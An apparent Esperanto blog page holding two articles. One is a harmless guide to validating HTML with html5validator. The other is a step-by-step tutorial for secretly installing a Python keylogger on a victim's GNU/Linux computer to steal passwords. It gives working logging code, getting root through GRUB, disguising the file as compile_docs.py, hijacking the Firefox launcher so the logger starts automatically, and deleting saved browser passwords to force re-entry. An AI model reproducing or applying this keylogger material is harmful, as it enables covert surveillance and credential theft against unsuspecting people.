En ĉi tiu artikolo mi montras al vi kiel programi klavaroregistrilon, kiu sendas mesaĝojn per retpoŝto kaj detruiĝas post difinita dato.
Legu plu el Klavaroregistrilo (keylogger) por GNU/Linukso. Retpoŝte sendi informojn kaj detruiĝiEtikedo: Python
Baza klavaroregistrilo (keylogger) por GNU/Linukso. Ŝteli pasvortojn kaj tajpitajn informojn
Simpla maniero ŝteli pasvortojn estas instali klavaroregistrilon (keylogger) en la komputilo de nia viktimo. Mi montros kiel fari tion en GNU/Linukso per la Python-programlingvo.
Unue ni devas akiri permesojn de ĉefuzanto. Se la komputilo estas administrita de ni, ni jam scias la pasvorton. Se tio ne estas nia okazo, ni povas akiri aliron de ĉefuzanto per GRUB. Per la necesaj permesoj ni jam povas instali la klavaroregistrilon.
Unue, oni devas instali la pynput-bibliotekon per...
sudo pip install pynput
Sekve ni devas skribi la klavaroregistrilon. Jen la kodo, kiun ni uzos:
#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging
log_dir = "/usr/share/doc/python3/"
logging.basicConfig(filename=(log_dir + "log"), \
level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
La klavaroregistrilo konserviĝas en log_dir. Mi, ĉi-okaze, specifis la
dokumentaran dosieron de Python 3 en GNU/Linukso. Ni ankaŭ povas
konservi la klavaroregistrilon en tiun dosierujon, eble uzante la nomon
compile_docs.py aŭ iun similan, por ne altiri la atenton.
Plej bone estas elekti dosierujon, kiun la viktimo ne eniros, por eviti,
ke ri ne rimarku tion, kion ni faras.
Fine ni devus plenumi la programon ĉiam, kiam oni ŝaltu la komputilon aŭ
programo estu plenumita, sen ke la viktimo rimarku. Se, ekzemple, ni
volas startigi la klavaroregistrilon ĉiam, kiam la uzanto malfermu
Firefox-on, ni povas modifi la Firefox-komandon. Ni povas alinomi
firefox1 al firefox.bin kaj krei la jenan dosieron nomitan
firefox.
python3 /usr/share/doc/python3/compile_docs.py &
exec firefox.bin "$@"
Por scii kiu firefox-dosiero estas plenumita, kiam ni premas ĝian
bildeton, ni devas iri al
/usr/share/applications, eniri la dosieron firefox.desktop (aŭ
firefox-esr.desktop) kaj serĉi la linion, kiu komenciĝas per Exec.
Sekve ni devus doni al ĝi skribpermesojn por aliaj uzantoj malsamaj ol
root al la dosierujo, kie ni konservos la klavaroregistrilon:
sudo chmod o+w /usr/share/doc/python3
Finfine ni devus atendi ĝis la viktimo uzu la komputilo por atingi riajn
pasvortojn aŭ ĉian ajn informon, kiun ri tajpu, kiun ni volas akiri. La
registroj de klavoj estos konservita en la dosiero
/usr/share/doc/python3/log. Sed estu singarda: la dosiero povus preni
multe da spaco, se vi ne forigas ĝin de tempo al tempo; do plej bone
estus malinstali la klavaroregistrilon post la akiro de la informoj,
kiujn vi bezonas. Alia opcio estas agordi ĝin, por ke ĝi sendu la
informon de tajpado per retpoŝto anstataŭ konservi ĝin en dosieron. Tiel
ĝi ne prenus multe da spaco en la viktimula komputilo; sed tiu metodo
postulas, ke ni uzu retadreson2.
Se la viktimo havas la pasvortojn konservitajn en la retumilo kaj ne
bezonas skribi ilin denove, ni povas forigi la dosieron de pasvortoj,
por ke ĝi estu devigita enigi ilin denove. Resume, ni povas ruze akiri
multe da informo, speciale se ni uzas ĉi tiun metodon kontraŭ
amatoraj uzantoj, kiuj ne multe suspektos. Por progresintaj uzantoj eble
plej bonas kompili la compile_docs.py-programon per
Nuitka, kiel mi montras en la sekva
artikolo.
Efektive validigi HTML-n
La lingvo HTML konformas kun la WHATWG-normo. Ĉar ĝi estas markolingvo, eraro en HTML ne kaŭzas, ke la paĝaro ceŝu funkcii, sed la retumilo ĝin montras kiel eble plej bone.
Havi erarojn en HTML estas problema, ĉar ĝi povas aperigi neatenditajn kaj malfacile reprodukteblajn erarojn, ĉefe kiam ili nur aperas en konkreta retumilo. Do estas necesega skribi validan HTML-n.
Tamen estas facile fari erarojn kaj ĝin pretervidi. Sekve oni rekomendas validigi la HTML-kodon, tio estas, trovi la erarojn kaj korekti ilin. Por tio ekzistas validiloj, kiuj generale simple montras erarojn. La plej ĝisdatigita kaj rekomendinda estas The Nu Html Checker. La W3C subtenas nodon de ĉi tiu validilo, kiu permesas al ni validigi HTML-dokumentojn en la retumilo, enigante URL-n, alŝutante dosieron kaj skribante la kodon en formularo. Ĉar ĉi tiu validilo estas libera programaro, vi povas instali ĝin facile en via komputilo.
La reta validilo bone funkcias, se vi nur devas validigi kelkajn
retejojn okaze, sed ĝi ne utilas por validigi tutan retejon. Por tio mi
rekomendas uzi la version de The Nu Html Checker, kiun oni plenumas en
terminalo. Ĝi troviĝas en la dosiero vnu.jar (Java estas bezona).
Mi persone uzas la html5validator-pakon, ĉar mi laboras kun Python kaj ĝi ne signifas kroma dependaĵo. Por instali ĉi tiun pakon en GNU/Linukso-distribuo bazita sur Debiano oni nur devas plenumi...
sudo apt install default-jre
sudo pip3 install html5validator
Post la instalo havas ni programon kun la nomo html5validator, kiun ni povas plenumi en la terminalo:
html5validator index.html
Utilega argumento estas --root, kiu permesas validigi ĉiujn dosierojn
en dosierujo, kaj en la dosierujo ene de la dosierujo..., tiel ĝis ĉiun
ĝi validigis. Mi uzas ĝin donante la kernan dosierujon de mia retejo,
validante tiel la tutan retejon en kelkaj sekundoj.
html5validator --root retejo/
Estas inde uzi ian kontinuan integriĝon por eviti plenumi mane la antaŭan komandon ĉiam, kiam vi ŝanĝas ion en la retejo. Por tio mi uzas GitLab CI. Tiel mi prizorgas ĉi tiun retejon kaj multajn aliajn sen HTML-eraroj kaj kiam mi rompas ion, mi rimarkas baldaŭ.
